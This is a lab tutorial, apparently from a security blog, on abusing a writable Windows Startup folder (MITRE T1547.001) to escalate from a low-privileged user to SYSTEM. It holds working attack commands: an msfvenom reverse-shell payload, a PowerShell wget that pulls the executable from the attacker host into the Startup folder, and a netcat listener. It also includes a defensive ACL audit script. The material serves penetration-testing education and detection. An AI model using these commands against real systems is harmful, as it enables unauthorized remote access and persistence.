The Windows Startup folder may be abused by an attacker for privilege escalation or persistence. Adding an application to a Startup folder or referencing it from a Registry Run key are two ways to do this. When a user signs in, any program referenced by a Run key in the Registry or placed in a Startup folder is executed. These programs run in the context of the signing-in user and inherit that account's permission level.
Table of Contents
Windows Startup Folder
Boot or Logon Autostart Execution (MITRE ATT&CK)
Prerequisite
Lab Setup
Privilege Escalation by Abusing Startup Folder
- Enumerating Assigned Permissions using Icacls
- Enumerating Assigned Permissions using Accesschk.exe
- Creating Malicious Executable
Windows Startup Folder
The Startup folder is a folder accessible from the Start Menu. Programs saved in this folder start automatically once a user logs on to the machine. There are two locations for the Startup folder in Windows.
- The All Users Startup folder functions at the system level and is shared by all user accounts.
The All Users Startup folder is found at the following path:
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
- Run dialog box (Windows Key + R): type shell:common startup
- Each user on the system also has their own Startup folder that executes at the user level.
The Current User Startup folder is located here:
- C:\Users\<User_Name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- Run dialog box (Windows Key + R): type shell:startup
Boot or Logon Autostart Execution: Startup Folder
Placing a malicious program in a Startup folder causes that program to execute whenever a user logs in, so a Startup folder with misconfigured permissions can help an attacker achieve persistence or privilege escalation.
This technique is a widely used persistence method among well-known APT groups such as APT3, APT33 and APT39.
MITRE ID: T1547.001
Tactics: Privilege Escalation & Persistence
Platforms: Windows
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: AccessChk.exe
Condition: A foothold on the target machine as a low-privileged user, obtained with Metasploit, Netcat or a similar tool.
Objective: Escalate a low-privileged user to NT AUTHORITY\SYSTEM by exploiting the misconfigured Startup folder.
Lab Setup
Note: The following setup deliberately creates a loophole through a misconfigured Startup folder; avoid such a configuration in a production environment.
Step 1: Navigate to the Startup directory using the following path:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Step 2: Open the Startup folder's Properties and select the Security tab. Click Edit to assign dangerous permissions to the Users group.
Step 3: Select the Users group of the target system and assign Read and Write, or Full Control, permissions.
Privilege Escalation by Abusing Startup Folder
Enumerating Assigned Permissions with Icacls
Attackers can abuse these locations to launch malware, such as a RAT, in order to maintain persistence across system reboots.
Following an initial foothold, we can identify permissions using the following command:
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Enumerating Assigned Permissions using Accesschk.exe
AccessChk.exe is a Sysinternals tool that also reports the effective permissions on a file or folder:
accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Here read/write permission is assigned to BUILTIN\Users.
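From the defender's side, the same misconfiguration can be checked for routinely. The following PowerShell script is an added example (not part of the original post) that audits both Startup folder locations for write access held by broad groups and inventories the files that would run at logon; the list of broad principals and the rights mask are assumptions chosen for this check.

```powershell
# Added example, not from the original post: audit both Startup folder locations
# for write access granted to broad groups, then list what currently auto-runs.
$startupPaths = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",  # All Users (shell:common startup)
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"       # Current user (shell:startup)
)

# Assumed list of broad principals that should never hold write rights on the All Users folder.
$broadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

# Assumed rights mask: any of these lets a principal drop, replace or re-permission files here.
$writeMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

foreach ($path in $startupPaths) {
    if (-not (Test-Path -LiteralPath $path)) { continue }
    Write-Host "== $path"

    # Walk the explicit and inherited ACEs on the folder itself.
    $acl = Get-Acl -LiteralPath $path
    foreach ($ace in $acl.Access) {
        $grantsWrite = ([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0
        $isBroad     = $broadPrincipals -contains $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and $isBroad) {
            Write-Warning ("{0} can write to {1} ({2}); this is the misconfiguration the lab setup creates" -f
                $ace.IdentityReference, $path, $ace.FileSystemRights)
        }
    }

    # Inventory: every file here runs at the next logon of the affected user(s).
    # Hash and signature status make unexpected binaries easy to spot.
    Get-ChildItem -LiteralPath $path -Force -File |
        Select-Object Name, Length, LastWriteTime,
            @{n='Sha256'; e={ (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash }},
            @{n='Signed'; e={ (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status }}
}
```

Generic access rights (shown by icacls as GR, GW, GE, GA) are not expanded by this mask, so an ACE carrying only generic flags is reported by icacls but not flagged here.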
Creating Malicious Executable
Since the current user holds read/write permission on the Startup folder, a RAT can be dropped there for persistence or privilege escalation. Let's create an executable with the help of msfvenom and serve it over HTTP:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
python -m SimpleHTTPServer 80
Executing Malicious Executable
Start a netcat listener in a new terminal and transfer shell.exe into the Startup folder with the help of the following commands:
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell wget 192.168.1.3/shell.exe -o shell.exe
dir
As the technique name Boot or Logon Autostart Execution implies, shell.exe runs when the system reboots and a user logs on.
The attacker then receives a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.
Reference: https://attack.mitre.org/techniques/T1547/001/
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, a social media lover and a gadgets enthusiast.